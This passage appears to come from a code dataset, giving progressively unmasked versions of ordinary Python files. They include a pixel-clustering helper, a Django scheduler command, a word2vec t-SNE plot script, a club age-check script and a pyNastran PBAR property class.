else:
count = -1;
return count;
|
flexible
|
{
"blob_id": "918db455fc50b49ca2b40dd78cecdec4ba08dcb8",
"index": 6013,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-3": "<mask token>\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-4": "import math\nfrom utils.util import distance\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-5": "import math\n\n# 计算像素点属于哪个中心点\nfrom utils.util import distance\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp(((distance(color, last_mean) / 80) ** 2) * -1)\ndef get_Count_By_distance(centers, pixel_use,d):\n\n # d_min设置过低会产生多的中心点,许多很相似但是没有归到一类中\n # d_min设置过高产生少的中心点,不相似的归到一类中\n d_min = 1;\n d_b = d;\n count_use = 0;\n for i in range(len(centers)):\n\n d = attenuation(centers[i], pixel_use);\n if d < d_min:\n d_min = d;\n count_use = i;\n\n if d_min < d_b:\n count = count_use;\n else:\n count = -1;\n return count;\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# coding=utf-8
from django.core.management.base import BaseCommand
from BanBanTong.utils import task_scheduler
class Command(BaseCommand):
'''
启动BanBanTong.tasks定时任务
'''
def handle(self, *args, **options):
task_scheduler.start()
|
normal
|
{
"blob_id": "e9c81be79d9107433e00182c27488e64f1ca779f",
"index": 1458,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-4": "from django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-5": "#!/usr/bin/env python\n# coding=utf-8\nfrom django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n '''\n 启动BanBanTong.tasks定时任务\n '''\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# coding: utf-8
import re
import numpy as np
from sklearn.manifold import TSNE
import word2vec
from matplotlib import pyplot as plt
from adjustText import adjust_text
import nltk
'''
word2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)
word2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)
word2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)
'''
model = word2vec.load('text.bin')
words = [word for word in model.vocab[:500]]
X = [ model[word] for word in words]
X = np.array(X)
tsne = TSNE(n_components=2)
X_tsne = tsne.fit_transform(X)
def plot_scatter(x,y,texts,adjust=False):
fig, ax = plt.subplots()
ax.plot(x, y, 'bo')
texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]
if adjust:
plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')
plt.savefig("500")
pattern = re.compile(r"[,.:;!?“”’]")
X, Y, texts = [], [], []
for i,word in enumerate(words):
if not pattern.findall(word):
tag = nltk.pos_tag([word])
if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':
continue
X.append(X_tsne[i][0])
Y.append(X_tsne[i][1])
texts.append(word)
print(len(X))
plot_scatter(X, Y, texts, True)
|
normal
|
{
"blob_id": "31996699bec6507d941eb8a7aaacffbd6248d79c",
"index": 7112,
"step-1": "<mask token>\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\n<mask token>\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-3": "<mask token>\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\npattern = re.compile('[,.:;!?“”’]')\nX, Y, texts = [], [], []\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-4": "import re\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport word2vec\nfrom matplotlib import pyplot as plt\nfrom adjustText import adjust_text\nimport nltk\n<mask token>\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\npattern = re.compile('[,.:;!?“”’]')\nX, Y, texts = [], [], []\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-5": "# coding: utf-8\nimport re\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport word2vec\nfrom matplotlib import pyplot as plt\nfrom adjustText import adjust_text\nimport nltk\n'''\nword2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)\nword2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)\nword2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)\n'''\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [ model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x,y,texts,adjust=False):\n\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')\n plt.savefig(\"500\")\n\npattern = re.compile(r\"[,.:;!?“”’]\")\nX, Y, texts = [], [], []\nfor i,word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\n\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('-' * 60)
print(
'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'
)
print()
<|reserved_special_token_0|>
if age >= 21:
print('Cool, come on in.')
else:
print(
'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '
)
print('Anyway...have a good day! ')
print('-' * 60)
<|reserved_special_token_1|>
print('-' * 60)
print(
'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'
)
print()
age = input('What is your age today? ')
age = int(age)
if age >= 21:
print('Cool, come on in.')
else:
print(
'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '
)
print('Anyway...have a good day! ')
print('-' * 60)
|
flexible
|
{
"blob_id": "19ffac718008c7c9279fb8cbc7608597d2d3e708",
"index": 3937,
"step-1": "<mask token>\n",
"step-2": "print('-' * 60)\nprint(\n 'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'\n )\nprint()\n<mask token>\nif age >= 21:\n print('Cool, come on in.')\nelse:\n print(\n 'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '\n )\n print('Anyway...have a good day! ')\nprint('-' * 60)\n",
"step-3": "print('-' * 60)\nprint(\n 'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'\n )\nprint()\nage = input('What is your age today? ')\nage = int(age)\nif age >= 21:\n print('Cool, come on in.')\nelse:\n print(\n 'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '\n )\n print('Anyway...have a good day! ')\nprint('-' * 60)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from numpy import array, zeros, arange, concatenate, searchsorted, where, unique
from pyNastran.bdf.fieldWriter import print_card_8
from pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,
double_or_blank, integer_double_or_blank, blank)
class PBAR(object):
type = 'PBAR'
def __init__(self, model):
"""
Defines the PCOMP object.
:param self: the PCOMP object
:param model: the BDF object
:param cards: the list of PCOMP cards
"""
self.model = model
self.n = 0
self._cards = []
self._comments = []
def add(self, card, comment):
self._cards.append(card)
self._comments.append(comment)
def build(self):
cards = self._cards
ncards = len(cards)
self.n = ncards
if ncards:
#: Property ID
self.property_id = zeros(ncards, 'int32')
self.material_id = zeros(ncards, 'int32')
self.area = zeros(ncards, 'float64')
self.I1 = zeros(ncards, 'float64')
self.I2 = zeros(ncards, 'float64')
self.J = zeros(ncards, 'float64')
self.nsm = zeros(ncards, 'float64')
for i, card in enumerate(cards):
#: property ID
self.property_id[i] = integer(card, 1, 'property_id')
#: material ID
self.material_id[i] = integer(card, 2, 'material_id')
#: material ID
self.area[i] = double_or_blank(card, 3, 'area', 0.0)
#: I1
self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)
#: I2
self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)
#: Polar Moment of Inertia J -> use J()
#: default=1/2(I1+I2) for SOL=600, otherwise 0.0
#: .. todo:: support SOL 600 default
Jdefault = 0.5 * (self.I1[i] + self.I2[i])
self.J[i] = double_or_blank(card, 6, 'J', Jdefault)
self.nsm[i] = double_or_blank(card, 7, 'non-structural_mass', 0.0)
if 0:
self.C1 = double_or_blank(card, 9, 'C1', 0.0)
self.C2 = double_or_blank(card, 10, 'C2', 0.0)
self.D1 = double_or_blank(card, 11, 'D1', 0.0)
self.D2 = double_or_blank(card, 12, 'D2', 0.0)
self.E1 = double_or_blank(card, 13, 'E1', 0.0)
self.E2 = double_or_blank(card, 14, 'E2', 0.0)
self.F1 = double_or_blank(card, 15, 'F1', 0.0)
self.F2 = double_or_blank(card, 16, 'F2', 0.0)
#: default=infinite; assume 1e8
self.K1 = double_or_blank(card, 17, 'K1', 1e8)
#: default=infinite; assume 1e8
self.K2 = double_or_blank(card, 18, 'K2', 1e8)
#: I12 -> use I12()
self.i12 = double_or_blank(card, 19, 'I12', 0.0)
if self.A == 0.0 and self.i12 == 0.0:
assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (self.A, self.i12, self.K1)
assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (self.A, self.i12, self.K2)
assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)
i = self.property_id.argsort()
self.property_id = self.property_id[i]
self.material_id = self.material_id[i]
self.area = self.area[i]
self.I1 = self.I1[i]
self.I2 = self.I2[i]
self.J = self.J[i]
self.nsm = self.nsm[i]
unique_pids = unique(self.property_id)
if len(unique_pids) != len(self.property_id):
raise RuntimeError('There are duplicate PCOMP IDs...')
self._cards = []
self._comments = []
#=========================================================================
def get_index(self, property_ids):
if isinstance(property_ids, int):
property_ids = array([property_ids])
if property_ids is None:
return arange(self.n)
indexs = searchsorted(self.property_id, property_ids)
assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs, property_ids)
return indexs
#=========================================================================
def write_bdf(self, f, size=8, property_ids=None):
if self.n:
if property_ids is None:
i = arange(self.n)
else:
i = searchsorted(self.property_id, property_ids)
for (pid, mid, area, I1, I2, J) in zip(self.property_id[i], self.material_id[i],
self.area[i], self.I1[i], self.I2[i], self.J[i]):
card = ['PBAR', pid, mid, area, I1, I2, J]
f.write(print_card_8(card))
|
normal
|
{
"blob_id": "8f960ad465d0a7bf48752db35c73169be6da27d8",
"index": 9092,
"step-1": "<mask token>\n\n\nclass PBAR(object):\n <mask token>\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n <mask token>\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n 
self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass PBAR(object):\n <mask token>\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 
is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-3": "<mask token>\n\n\nclass PBAR(object):\n type = 'PBAR'\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 
is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-4": "from numpy import array, zeros, arange, concatenate, searchsorted, where, unique\nfrom pyNastran.bdf.fieldWriter import print_card_8\nfrom pyNastran.bdf.bdfInterface.assign_type import integer, integer_or_blank, double_or_blank, integer_double_or_blank, blank\n\n\nclass PBAR(object):\n type = 'PBAR'\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 
18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-5": "from numpy import array, zeros, arange, concatenate, searchsorted, where, unique\n\nfrom pyNastran.bdf.fieldWriter import print_card_8\nfrom pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,\n double_or_blank, integer_double_or_blank, blank)\n\n\nclass PBAR(object):\n type = 'PBAR'\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n\n if ncards:\n #: Property ID\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n\n for i, card in enumerate(cards):\n #: property ID\n self.property_id[i] = integer(card, 1, 'property_id')\n\n #: material ID\n self.material_id[i] = integer(card, 2, 'material_id')\n\n\n #: material ID\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n\n #: I1\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n\n #: I2\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n\n #: Polar Moment of Inertia J -> use J()\n #: default=1/2(I1+I2) for SOL=600, otherwise 0.0\n #: .. 
